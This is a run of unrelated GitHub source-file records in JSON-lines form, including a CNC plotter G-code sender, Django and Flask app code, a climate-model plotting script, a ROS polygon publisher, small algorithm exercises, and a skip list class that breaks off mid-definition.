make_home(self, p: Point):\n # Teleport\n self._send_gcode(f'G92 {p.gcode}')\n logger.debug('Received: {}'.format(self._wait_read()))\n\n self.set_home(p)\n\n def go_home(self, speed=None):\n if speed is None:\n speed = self._current_settings.speed_idle\n\n # self._send_gcode(f'G28 F{speed}')\n self._send_gcode(f'G00 {str(self._home)} F{speed}')\n\n def run_code_block(self, raw: str):\n\n self._wait_for_idle()\n\n n = 0\n for line in gcode_reader(raw):\n n += 1\n\n if not line.statement:\n continue\n\n logger.debug('Processing line {}'.format(n))\n\n self._send_gcode(line)\n self._wait_for_idle()\n\n def run_file(self, gcode_path: str):\n # Make sure to lift pen\n self._send_gcode(f'G01 Z{self._current_settings.angle_pen_up} F{self._current_settings.speed_pen_lift}')\n\n # Write GCODE\n with open(gcode_path) as f:\n self.run_code_block(f)\n\n # Make sure to lift pen\n self._send_gcode(f'G01 Z{self._current_settings.angle_pen_up} F{self._current_settings.speed_pen_lift}')\n\n # Goto init position\n self.go_home()\n","repo_name":"wenoptics/cnc-polarplotter","sub_path":"sender/gcode_robot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8697453188","text":"from django.urls import path\nimport myapp.views as mv\n\nurlpatterns = [\n path('',mv.index),\n path('read//',mv.read),\n path('update//',mv.update),\n path('create/',mv.create),\n path('delete/',mv.delete)\n]\n","repo_name":"Sim-918/Django_CRUD","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29293731462","text":"from matplotlib import pyplot as plt \nimport cartopy.crs as ccrs\nfrom cartopy.util import add_cyclic_point\nimport cartopy.crs as ccrs\nfrom netCDF4 import 
Dataset\nimport numpy as np \nimport os\nfrom tqdm import tqdm\n\n\"\"\"\nScript for reproducing images used in Extended Data Figure 1\n\"\"\"\n\nmodels_list = [\n 'ACCESS-CM2',\n 'AWI-CM-1-1-MR',\n 'BCC-CSM2-MR',\n 'CAMS-CSM1-0',\n 'CanESM5-CanOE',\n 'CMCC-CM2-SR5',\n 'CNRM-CM6-1',\n 'CNRM-ESM2-1',\n 'FGOALS-f3-L',\n 'FGOALS-g3',\n 'GFDL-ESM4',\n 'IITM-ESM',\n 'INM-CM4-8',\n 'INM-CM5-0',\n 'IPSL-CM6A-LR',\n 'KACE-1-0-G',\n 'MIROC6',\n 'MPI-ESM1-2-LR',\n 'MRI-ESM2-0',\n 'NorESM2-MM',\n 'TaiESM1',\n 'UKESM1-0-LL'\n ]\n\nshort_scenarios_list = ['ssp245', 'ssp370', 'ssp585']\nvariable_short = 'tas'\n\nROOT_DATA = '../Source_data'\nSIMULATIONS_DIRECTORY = f'{ROOT_DATA}/CMIP6_data/near_surface_air_temperature/Annual_uniform_remapped'\nPATH_BEST_DATA = f'{ROOT_DATA}/BEST_data/BEST_regridded_annual_1979-2022.nc'\n\nwith open('../area_cella.csv', newline='') as csvfile:\n area_cella = np.genfromtxt(csvfile, delimiter=',')\n\nn_BEST_datasets_per_model_scenario = 5\n\nstart_year_training = 1979\nend_year_training = 2022\nn_training_years = end_year_training-start_year_training+1\n\nstart_year_test = end_year_training+1\nend_year_test = 2098\nn_test_years = end_year_test-start_year_test+1\n\n\"\"\" Load DNNs predictions \"\"\"\npredictions = np.zeros((n_BEST_datasets_per_model_scenario, len(models_list), len(short_scenarios_list), n_training_years+n_test_years, 64, 128))\nfor model_idx, model in tqdm(enumerate(models_list), total=len(models_list)):\n for scenario_idx, scenario_short in enumerate(short_scenarios_list):\n for i in range(5):\n TRAIN_SET_PREDICTIONS_DIRECTORY = f'{ROOT_DATA}/Transfer_Learning_on_Observations/Training_set_predictions/tas_{model}_{scenario_short}_{i+1}'\n TEST_SET_PREDICTIONS_DIRECTORY = f'{ROOT_DATA}/Transfer_Learning_on_Observations/Test_set_predictions/tas_{model}_{scenario_short}_{i+1}'\n # Training set predictions\n model_train_set_predictions_filenames_list = os.listdir(TRAIN_SET_PREDICTIONS_DIRECTORY)\n model_train_set_predictions_filenames_list = [fn for fn in model_train_set_predictions_filenames_list if (fn.endswith('.csv'))]\n model_train_set_predictions_filenames_list.sort()\n model_train_set_prediction_array = np.zeros((n_training_years, 64, 128))\n for mp_idx, mp_filename in enumerate(model_train_set_predictions_filenames_list):\n if (not mp_filename.endswith('.csv')):\n continue\n file = open(f'{TRAIN_SET_PREDICTIONS_DIRECTORY}/{mp_filename}')\n model_train_set_prediction_array[mp_idx,:,:] = np.loadtxt(file, delimiter=',')\n predictions[i,model_idx,scenario_idx,:n_training_years,:,:] = model_train_set_prediction_array\n # Test set predictions\n model_test_set_predictions_filenames_list = os.listdir(TEST_SET_PREDICTIONS_DIRECTORY)\n model_test_set_predictions_filenames_list = [fn for fn in model_test_set_predictions_filenames_list if (fn.endswith('.csv'))]\n model_test_set_predictions_filenames_list.sort()\n model_test_set_prediction_array = np.zeros((n_test_years, 64, 128))\n for mp_idx, mp_filename in enumerate(model_test_set_predictions_filenames_list):\n if (not mp_filename.endswith('.csv')):\n continue\n file = open(f'{TEST_SET_PREDICTIONS_DIRECTORY}/{mp_filename}')\n model_test_set_prediction_array[mp_idx,:,:] = np.loadtxt(file, delimiter=',')\n predictions[i,model_idx,scenario_idx,n_training_years:,:,:] = model_test_set_prediction_array[:,:,:]\n\n\"\"\" Load CMIP6 ESMs simulations\"\"\"\nsimulation_array = np.zeros((len(models_list), len(short_scenarios_list), 2098-1850+1, 64, 128))\nfor model_idx, model in tqdm(enumerate(models_list), 
total=len(models_list)):\n for scenario_idx, scenario_short in enumerate(short_scenarios_list):\n simulations_files_list = os.listdir(SIMULATIONS_DIRECTORY)\n simulations_files_list.sort()\n matching_simulations = [simulation_file for simulation_file in simulations_files_list if ((model in simulation_file and 'historical' in simulation_file)\n or (model in simulation_file and scenario_short in simulation_file))]\n # maching_simuations[0] is the historical and matching_simulations[1] is the SSP simulation because of the sort operation\n # (for each model, the first simulation is the historical and then the SSP)\n nc_historical_data = Dataset(f'{SIMULATIONS_DIRECTORY}/{matching_simulations[0]}', mode='r+', format='NETCDF3_CLASSIC')\n nc_ssp_data = Dataset(f'{SIMULATIONS_DIRECTORY}/{matching_simulations[1]}', mode='r+', format='NETCDF3_CLASSIC')\n n_historical_years = nc_historical_data[variable_short].shape[0]\n n_ssp_years = nc_ssp_data[variable_short].shape[0]\n n_lats = nc_ssp_data['lat'].shape[0]\n n_lons = nc_ssp_data['lon'].shape[0]\n simulation_array[model_idx,scenario_idx,:n_historical_years] = nc_historical_data[variable_short][:]\n if (n_ssp_years == 86):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:-2]\n elif (n_ssp_years == 85):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:-1]\n elif (n_ssp_years == 84):\n simulation_array[model_idx,scenario_idx,n_historical_years:] = nc_ssp_data[variable_short][:]\n nc_historical_data.close()\n nc_ssp_data.close()\n\nnc_BEST_data = Dataset(PATH_BEST_DATA, mode='r+', format='NETCDF3_CLASSIC')\n\n\"\"\" Loada BEST observational data \"\"\"\nn_BEST_years = nc_BEST_data['st'].shape[0]\nn_lats = nc_BEST_data['lat'].shape[0]\nn_lons = nc_BEST_data['lon'].shape[0]\nlats = np.ma.getdata(nc_BEST_data['lat'][:])\nlons = np.ma.getdata(nc_BEST_data['lon'][:])\nBEST_data_array = np.zeros((n_BEST_years, n_lats, n_lons))\nBEST_data_array[:,:,:] = nc_BEST_data['st'][:,:,:]\nnc_BEST_data.close()\n\n# Compute average surface air temperature maps across DNNs predictions and CMIP6 ESMs simulations\navg_predictions_maps = np.mean(predictions, axis=(0,1))\navg_simulations_maps = np.mean(simulation_array, axis=0)\n\n# Compute average surface air temperature maps in 2081-2098\navg_predictions_maps_2081_2098 = np.mean(avg_predictions_maps[:,2081-1979:,:,:], axis=1)\navg_simulations_maps_2081_2098 = np.mean(avg_simulations_maps[:,2081-1850:,:,:], axis=1)\n\n# Compute average BEST map in 1980-1990 that will be used as baseline\nBEST_baseline_map_1980_1990 = np.mean(BEST_data_array[1:1990-1979+1,:,:], axis=0)\n\n# Compute avg warming maps in 2081-2098 wrt 1980-1990\nprediction_warming = avg_predictions_maps_2081_2098 - BEST_baseline_map_1980_1990\nsimulation_warming = avg_simulations_maps_2081_2098 - BEST_baseline_map_1980_1990\n\narea_cella_sum_over_lon = np.sum(area_cella, axis=1)\n\n# Compute avg warming values across latitudes\npredictions_means_over_lons = ((prediction_warming * area_cella).sum(axis=(2)))/area_cella_sum_over_lon\nsimulations_means_over_lons = ((simulation_warming * area_cella).sum(axis=(2)))/area_cella_sum_over_lon\n\n\"\"\" Plot \"\"\"\nfont = {'fontname':'Arial'}\nsize_suptitlefig = 35\nsize_title_fig = 30\nsize_scenario_text = 27\nsize_subplots_letters = 40\nsize_title_axes = 28\nsize_line_plot_legend = 16\nsize_lat_lon_coords = 23\nsize_colorbar_labels = 30\nsize_colorbar_ticks = 26\n\nfor scenario_idx, scenario_short in 
enumerate(short_scenarios_list):\n scenario = f'SSP{scenario_short[-3]}-{scenario_short[-2]}.{scenario_short[-1]}'\n\n min_value = np.concatenate((prediction_warming[scenario_idx,:,:], simulation_warming[scenario_idx,:,:])).min()\n max_value = np.concatenate((prediction_warming[scenario_idx,:,:], simulation_warming[scenario_idx,:,:])).max()\n\n max_abs_value = np.max([abs(min_value), abs(max_value)])\n levels = np.linspace(min_value, max_value, 40)\n\n if scenario_idx == 0:\n cbarticks = np.arange(-2,12,2)\n elif scenario_idx == 1:\n cbarticks = np.arange(-2,16,2)\n elif scenario_idx == 2:\n cbarticks = np.arange(-2,18,2)\n\n fig = plt.figure(constrained_layout=True, figsize=(30,10))\n ax = fig.add_gridspec(3,11)\n\n \"\"\" ax1 \"\"\"\n ax1 = fig.add_subplot(ax[1:, :5], projection=ccrs.Robinson())\n\n data_1 = prediction_warming[scenario_idx]\n data_cyclic_1, lons_cyclic_1 = add_cyclic_point(data_1, lons)\n cs1=ax1.contourf(lons_cyclic_1, lats, data_cyclic_1,\n vmin=-max_abs_value, vmax=max_abs_value, levels=levels, \n transform = ccrs.PlateCarree(),cmap='bwr')#, extend='both')\n ax1.coastlines()\n gl1 = ax1.gridlines(draw_labels=True, linestyle='--', color='black', linewidth=0.1)\n gl1.top_labels = False\n gl1.right_labels = False\n gl1.xlabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'font':'Arial'}\n gl1.ylabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'font':'Arial'}\n ax1.set_title(f'Deep Neural Networks ensemble', size=size_title_axes, pad=17, **font)\n\n cbar1 = plt.colorbar(cs1,shrink=0.7, ticks=cbarticks, orientation='horizontal', label='Surface Air Temperature anomaly [°C]') #,label='Temperature warming')\n cbar1.set_label(label='Surface Air Temperature anomaly [°C]', size=size_colorbar_labels, labelpad=20, family='Arial')\n for l in cbar1.ax.xaxis.get_ticklabels():\n l.set_family('Arial')\n l.set_size(size_colorbar_ticks)\n\n \"\"\" ax2 \"\"\"\n ax2 = fig.add_subplot(ax[1:, 5])\n\n ax2.plot(predictions_means_over_lons[scenario_idx], lats, label='DNN')\n ax2.plot(simulations_means_over_lons[scenario_idx], lats, label='CMIP6')\n ax2.set_ylim(bottom=0, top=0)\n plt.yticks([-90,-60,-30,0,30,60,90], ['90°S','60°S', '30°S', '0', '30°N', '60°N', '90°N'], fontname='Arial', fontsize=size_lat_lon_coords) # Set text labels.\n plt.xticks(fontname='Arial', fontsize=size_lat_lon_coords) # Set text labels.\n ax2.tick_params(axis='both', which='major', labelsize=size_lat_lon_coords)\n ax2.legend(loc='lower right', prop={'size': size_line_plot_legend, 'family':'Arial'})\n\n \"\"\" ax3 \"\"\"\n ax3 = fig.add_subplot(ax[1:, 6:], projection=ccrs.Robinson())\n data_3 = simulation_warming[scenario_idx]\n data_cyclic_3, lons_cyclic_3 = add_cyclic_point(data_3, lons)\n cs3=ax3.contourf(lons_cyclic_3, lats, data_cyclic_3,\n vmin=-max_abs_value, vmax=max_abs_value, levels=levels,\n transform = ccrs.PlateCarree(),cmap='bwr')#, extend='both')\n ax3.coastlines()\n gl3 = ax3.gridlines(draw_labels=True, linestyle='--', color='black', linewidth=0.1)\n gl3.top_labels = False\n gl3.right_labels = False\n gl3.xlabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'family':'Arial'}\n gl3.ylabel_style = {'size': size_lat_lon_coords, 'color': 'black', 'weight': 'normal', 'family':'Arial'}\n ax3.set_title(f'CMIP6 ensemble', size=size_title_axes, pad=17, **font)\n cbar3 = plt.colorbar(cs3,shrink=0.7,ticks=cbarticks,orientation='horizontal')# ,label='Temperature warming')\n cbar3.set_label(label='Surface Air Temperature 
anomaly [°C]', size=size_colorbar_labels, labelpad=20, family='Arial')\n for l in cbar3.ax.xaxis.get_ticklabels():\n l.set_family('Arial')\n l.set_size(size_colorbar_ticks)\n\n plt.draw()\n for ea in gl1.ylabel_artists:\n right_label = ea.get_position()[0] > 0\n if right_label:\n ea.set_visible(False)\n for ea in gl3.ylabel_artists:\n right_label = ea.get_position()[0] > 0\n if right_label:\n ea.set_visible(False)\n\n fig.suptitle(f'{scenario}', y=0.85, size=size_suptitlefig, **font)\n plt.savefig(f'Ext_Fig_1_{scenario_short}.png', bbox_inches = 'tight', dpi=300)\n plt.close()","repo_name":"francescoimmorlano/paper-review","sub_path":"Figures/Ext_Fig_1.py","file_name":"Ext_Fig_1.py","file_ext":"py","file_size_in_byte":12142,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36021679638","text":"import os\n\nfrom tqdm import tqdm\n\nfrom conversation import Conversation\n\npath = \"data/memo-corpus/vtt\"\nfor file in os.listdir(path):\n if \"group12\" in file:\n continue\n\n filepath = os.path.join(path, file)\n conv = Conversation(filepath)\n conv.load(compute_embeddings=False)\n conv.export_tsv(\"data/memo-corpus/tsv/sessions\" + file[:-4] + \".tsv\")\n\n\n# for i in range(1,16):\n\n\n# all_lines = []\n# for file in tqdm(os.listdir(\"tsvs/\")):\n# transcript_file = open(\"tsvs/\" + file, \"r\")\n# lines = transcript_file.readlines()\n# transcript_file.close()\n# all_lines.extend(lines)\n#\n# with open(\"memo-may16.tsv\", \"w\") as f:\n# f.writelines(all_lines)\n#\n","repo_name":"danieldeweerd/rp-meetingmastery","sub_path":"preprocessing/merge_all_data.py","file_name":"merge_all_data.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18113588364","text":"# coding:utf-8\n\n# 二分要求列表有序,返回的是元素的索引\n# 二分查找是不断查找中间位置的值和要查找的值做比较,\n# 不断调整猜测地范围来调整中间值\n# 复杂度 O(logn)\n\ndef binary_search(list, item):\n low = 0\n high = len(list) - 1\n # low和high表明查找范围\n\n while low <= high:\n # 只要范围没有缩小到只包含一个元素\n mid = (low+high)/2 # 中间位置\n guess = list[mid] # 猜测的元素\n if guess == item:\n return mid\n if guess > item:\n high = mid - 1\n else:\n low = mid + 1\n return None\n\n\nprint (binary_search([1,2,3,8,9,10],2))\n\n","repo_name":"fank-cd/books_exercise_code","sub_path":"Grokking Algorithms/Chapter 1 binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22028138281","text":"\"\"\"\nMicroservice module\n\nThis module contains the microservice code for\n server\n models\n\"\"\"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\n# Create the Flask aoo\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nfrom app import server, models\nfrom flasgger import Swagger\n\napp.config['SWAGGER'] = {\n \"swagger_version\": \"2.0\",\n \"specs\": [\n {\n \"version\": \"1.0.0\",\n \"title\": \"Shopcarts REST API Service\",\n \"description\":\"This is the Shopcart API\",\n \"endpoint\": 'v1_spec',\n \"route\": '/v1/spec',\n \"basePath\": '/'\n }\n ],\n}\n\n# Initialize Swagger after configuring it\nSwagger(app)\n","repo_name":"radhikamattoo/shopcarts","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} 
+{"seq_id":"41787525166","text":"from class_connectivity import connectivity\n\nconn = connectivity('7', 1.25)\n# name of atom, cutoff value\n\nconn.loadfile('step72M.lammpstrj')\n# input file\n\nconn.findcluster()\n\nconn.caldistro('clustersize.out')\n# output file\n\n# output of atoms to file is not completed\n# need to decide what kind of format\n# may use lammpstrj as the format, or the pdb\n# to check the clusters, run this script in the interactive mode.\n# data is in conn.clusters\n","repo_name":"fill-10/RDFConn","sub_path":"calConn.py","file_name":"calConn.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72582428484","text":"\"\"\"System module.\"\"\"\nfrom fastapi import Security\nfrom fastapi.security import APIKeyHeader, APIKeyQuery\nfrom starlette.exceptions import HTTPException\nfrom starlette.status import HTTP_403_FORBIDDEN\nfrom decouple import config\n\nAPI_KEY_NAME = \"api-key\"\napi_key_query = APIKeyQuery(\n name=API_KEY_NAME, scheme_name=\"API key query\", auto_error=False\n)\napi_key_header = APIKeyHeader(\n name=API_KEY_NAME, scheme_name=\"API key header\", auto_error=False\n)\n\n\ndef check_key(key: str):\n \"\"\"\n Check key\n \"\"\"\n return key == config(\"API_KEY_SECRET\", default=\"secret_key\", cast=str)\n\n\ndef verify_api_key(\n query_param: str = Security(api_key_query),\n header_param: str = Security(api_key_header),\n):\n \"\"\"\n Verify\n \"\"\"\n if config(\"USE_API_KEY\", default=True, cast=bool):\n if not query_param and not header_param:\n raise HTTPException(\n status_code=HTTP_403_FORBIDDEN,\n detail=\"An API key must be passed as query or header\",\n )\n\n if query_param and check_key(query_param):\n return query_param\n\n if header_param and check_key(header_param):\n return header_param\n\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=\"Invalid API key.\")\n # API key verification disabled\n return None\n","repo_name":"marrem96/macke","sub_path":"core/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26373429776","text":"from .models import MatchRegistration,MatchResult,User,Bet,Ranking,RegisterBet\nfrom django.db.models import F\nfrom .messages import Messages\n\n\nclass Aposta:\n cred = None\n id = None\n\n matchRegistration= MatchRegistration.objects.all()\n userCredito = None\n matchID = None\n\n users = User.objects.all()\n ranking = Ranking.objects.all()\n ordered = users.order_by('-credits')\n registerBet = RegisterBet.objects.all()\n\n\n def __init__(self,cred,id):\n self.cred = cred\n self.id = id\n self.userCredito = User.objects.get(login =self.cred)\n self.matchID = MatchRegistration.objects.get(id =self.id)\n\n\n\n def apostarRefresh(self):\n\n for match in self.matchRegistration:\n try:\n MatchResult.objects.get(game = match)\n except MatchResult.DoesNotExist:\n register = RegisterBet(id = match.id,homeTeam = match.homeTeam,visitorTeam = match.visitorTeam,date = match.date,hora = match.hora,game = match)\n register.save()\n count = 1\n for userRnk in self.ordered:\n try:\n Ranking.objects.get(user = userRnk)\n except Ranking.DoesNotExist:\n rank = Ranking(user = userRnk,position = count)\n rank.save()\n self.ranking.order_by('-user.credits')\n count = count 
+1","repo_name":"rafabispo93/TrabalhoP.Web","sub_path":"BetSoccer/bolao/aposta.py","file_name":"aposta.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72155458246","text":"import math\n\ndef squareRoot(n):\n for j in range(0,n+2):\n sum = 0\n for i in range(1,j+1):\n sum += (2*i-1)\n if sum > n:\n return j-1\n return 0\n\n\nfor i in range(0,100):\n if squareRoot(i) != math.floor(math.sqrt(i)):\n print(\"number: \", i, \"\\tsquareRoot: \", squareRoot(i), \"\\tmath: \", math.floor(math.sqrt(i)))","repo_name":"lukdz/KursPython","sub_path":"3lista/2zad.py","file_name":"2zad.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26540567505","text":"from rest_framework import (\n status,\n generics\n)\nfrom rest_framework.response import Response\n\nfrom shark_core.permissions import (\n PERM_IS_AUTHENTICATED,\n PERM_ALLOW_ANY\n)\n\nfrom .models import Group, Item, History\nfrom .serializers import (\n ItemSerializer,\n OfferSerializer\n)\nfrom .bonuses import bonus_factory\n\n\nclass ItemListView(generics.ListAPIView):\n \"\"\"\n Widok przedmiotow dostepnych do zakupu\n \"\"\"\n queryset = Item.objects.all()\n permission_classes = (PERM_ALLOW_ANY,)\n serializer_class = ItemSerializer\n\n @staticmethod\n def format_queryset(queryset):\n \"\"\"\n Dodajemy do queryset dodatkowe pola stworzone w danym bonusie\n \"\"\"\n new_queryset = []\n\n # Iterujemy po bonusach\n for bonus in queryset:\n # Pobieramy klase bonusu\n bonus_class = bonus_factory.get_bonus(bonus.group.tag)\n # Tworzymy instancje bomusu\n bonus_instance = bonus_class(bonus)\n # Przypisujemy do bonusu dodatwkoe pola\n bonus.fields = bonus_instance.get_fields()\n # Dodajemy do listy\n new_queryset.append(bonus)\n return new_queryset\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n # Formatujemy queryset\n formatted_queryset = self.format_queryset(queryset)\n page = self.paginate_queryset(formatted_queryset)\n if page is not None:\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n serializer = self.get_serializer(formatted_queryset, many=True)\n return Response(serializer.data)\n\n\nitem_list = ItemListView.as_view()\n\n\nclass OfferCreateView(generics.CreateAPIView):\n \"\"\"\n Widok tworzeniania oferty\n \"\"\"\n permission_classes = (PERM_IS_AUTHENTICATED,)\n serializer_class = OfferSerializer\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n item = serializer.validated_data['item']\n bonus_class = bonus_factory.get_bonus(item.group.tag)\n bonus_instance = bonus_class(item)\n bonus_instance.after_bought(user=request.user,\n extra_fields=serializer.validated_data.get('extra_fields', None))\n\n serializer.save(user=request.user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\noffer_create = OfferCreateView.as_view()\n","repo_name":"Qwizi/shark-core","sub_path":"backend/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"17098444309","text":"#!/usr/bin/env python2\n\nimport rospy\nfrom 
geometry_msgs.msg import PolygonStamped, Point32\nimport numpy as np\n\nlab_safe_area = np.array([[0,0],\n [0,1],\n [0.7,1],\n [0.7,6.2],\n [1.1,6.2],\n [1.1,3.8],\n [1.7,3.8],\n [1.7,0],\n [8,0],\n [1.7,0],\n [1.7,-1],\n [1.4,-1],\n [1.4,-4.7],\n [-1,-4.7],\n [-1,-3],\n [0,-3],\n [0,0]])\n\ndef visualize_lab_area():\n rospy.init_node('Lab_Polygon_Node', anonymous=True)\n lab_area_pub = rospy.Publisher(\"/lab_area\", PolygonStamped, queue_size=5)\n \n lab_area_msg = PolygonStamped()\n lab_area_msg.header.frame_id = 'world'\n\n for point in lab_safe_area:\n point_msg = Point32()\n point_msg.x = point[0]\n point_msg.y = point[1]\n lab_area_msg.polygon.points.append(point_msg)\n\n node_timer = rospy.Rate(1)\n while not rospy.is_shutdown():\n lab_area_pub.publish(lab_area_msg)\n node_timer.sleep()\n \n\n\nif __name__ == '__main__':\n try:\n visualize_lab_area()\n except rospy.ROSInterruptException:\n pass\n \n","repo_name":"harry5081/donkey_project","sub_path":"src/donkey_mecanum_description/scripts/lab_area_poly.py","file_name":"lab_area_poly.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7365556179","text":"import random\n# pre-define the magic number as constant\n# the list start from one which is also the step for iteration\nstart = step = 1\n# the firstelement of a string is starting from 0\nfirst_element = first_step = 0\n# the fixed probability to randomize num of levels\nfixed_probability = 0.5\n\n\nclass Node():\n '''The regular node that takes a data and connect with the next node in\n linked list.\n '''\n\n def __init__(self, data, next_node=None):\n '''(Node, obj, Node) -> Nonetype\n It initiates this class by adding its data and the node connected next.\n The next node is defualt as None.\n '''\n self.data = data\n self.next_node = next_node\n\n def __str__(self):\n '''(Node) -> str\n It returns the data of the Node unless it is a head node.\n '''\n # see first whether the data is negative inf. If so, return the str\n # Head\n if self.data == -float('inf'):\n return 'Head'\n # or return the data\n return str(self.data)\n\n\nclass Ref_Node(Node):\n '''The Node that can reference to the node with the same value in the lower\n layer. As well, it connects to its next node like a regular Node because it\n is inherited from the Node.\n '''\n\n def __init__(self, data, next_node=None, refer_node=None):\n '''(Ref_Node, obj, [Ref_Node, Node]) -> Nonetype\n This intialize the Ref_Node and leave the data and next_node to the\n factors it has inherited from Node. The refer_node is the new unique\n function of this class.\n '''\n # Implement with its parent class Node\n Node.__init__(self, data, next_node)\n # add value to its refer_Node function\n self.refer_node = refer_node\n\n def __str__(self):\n '''(Ref_Node) -> str\n Return the data in the Ref_Node.\n '''\n return str(self.data)\n\n\nclass Start_Node(Ref_Node):\n '''The node at the start with a negative infinite sign. It inherits from\n the Ref_Node\n '''\n def __init__(self):\n '''(Start_Node) -> Nonetype\n Initialize the Start_Node with implementing Ref_Node\n '''\n Ref_Node.__init__(self, -float('inf'))\n\n def __str__(str):\n '''(Start_Node) -> str\n Return the str Head\n '''\n return 'Head'\n\n\nclass End_Node(Ref_Node):\n '''The node at the end only with an infinite sign, inheriting from Node.\n '''\n def __init__(self):\n '''(End_Node) -> Nonetype\n Intialize the End_Node by implementing the functions in Node. 
Plus the\n data parameter is specified to be positive infinite.\n '''\n Ref_Node.__init__(self, float('inf'))\n\n def __str__(self):\n '''(End_Node) -> str\n Return str Tail.\n '''\n return 'Tail'\n\n\nclass SkipList():\n '''This is a data structure that ease the search of an element in the\n middle. It may have multiple levels with some elements from the linked list\n in the first level being skiped. This can quicken the search machanism when\n an element far after the head required to be sought.\n '''\n def __init__(self, probability=fixed_probability):\n '''(self, [int]) -> Nonetype\n Intiate the skip list with the fixed probability.\n '''\n # set the head of the first level to be an empty Start_Node\n self.head = Start_Node()\n # set the tail of the first level to be an empty End_Node\n self.tail = End_Node()\n # connect self.head and self.tail since they don't have element in\n # between\n self.head.next_node = self.tail\n # The height of the Skip list\n self.level = start\n # the head of the top level is self.head because it just has one level\n self.top_head = self.head\n # the tail of the top level is self.tail because it just has one level\n self.top_tail = self.tail\n # the probability is always the fixed_probability\n self.probability = probability\n self.length = first_element\n\n def __str__(self):\n '''(SkipList) -> str\n Return the content of the skiplist in the required form\n '''\n # define a return_value and initiate it to be 0\n return_value = ''\n # start to add the element from the self.top_head\n head_node = self.top_head\n # iterate through the first column that contains only Start_Node\n while head_node is not None:\n # set the first node to be the head node and iterate in each row\n node = head_node\n return_value += 'Head->'\n while node.next_node is not None:\n node = node.next_node\n # add the element before the tail\n if node.data != float('inf'):\n return_value = return_value + str(node.data) + '->'\n else:\n # add tail when it reaches the last one\n return_value += 'Tail'\n # change line when it is not in the last row\n if head_node.refer_node is not None:\n return_value += '\\n'\n # go to the next row\n head_node = head_node.refer_node\n # return the value it needs to print\n return return_value\n\n def type_converter(self, node):\n '''(SkipList, Node/Ref_Node) -> obj\n It converts the type of the data when the data of different types need\n to be compared.\n '''\n # test whether the data is str\n if type(node.data) == str:\n # if so see its length, if its length is one, convert itself to the\n # type required\n if len(node.data) == start:\n # take the order of the alphabet\n if node.data.isalpha():\n return ord(node.data)\n else:\n return float(node.data)\n else:\n # then see if the data with long length is convertible to\n # float for the comparison. 
If not, take the first character of\n # then convert it to float\n contain_nondecimal = False\n for element in node.data:\n decimal_point = first_step\n if not element.isnumeric():\n if element == '.':\n decimal_point += 1\n else:\n contain_nondecimal = True\n if decimal_point > start:\n contain_nondecimal = True\n if contain_nondecimal:\n if node.data[first_element].isalpha():\n return ord(node.data[first_element])\n else:\n return float(node.data[first_element])\n else:\n return float(node.data)\n else:\n # or remain unchanged\n return node.data\n\n def insert_LinkedList(self, new_node, node=None):\n '''(SkipList, Node/Ref_Node, [Start_Node]) -> Nonetype\n Add the element to its right position based on its magnitude\n '''\n if node is None:\n node = self.head\n while node.next_node is not None:\n if type(new_node.data) == type(node.next_node.data):\n new_node_data = new_node.data\n next_node_data = node.next_node.data\n else:\n new_node_data = self.type_converter(new_node)\n next_node_data = self.type_converter(node.next_node)\n if next_node_data >= new_node_data:\n tmp = node.next_node\n node.next_node = new_node\n new_node.next_node = tmp\n return\n node = node.next_node\n\n def add_to_level(self, new_obj, level, bottom_node=None):\n new_node = Node(new_obj)\n if level == start:\n # add the new_node into the first level, the linked list\n self.insert_LinkedList(new_node)\n else:\n node_head = self.top_head\n for index in range(self.level - level):\n node_head = node_head.refer_node\n bottom_node = self.add_to_level(new_obj, level - 1)\n new_node = Ref_Node(new_obj)\n self.insert_LinkedList(new_node, node_head)\n new_node.refer_node = bottom_node\n return new_node\n\n def create_level(self, new_obj, level, bottom_node):\n '''\n When the level does not exist at first, create the levels and add the\n node 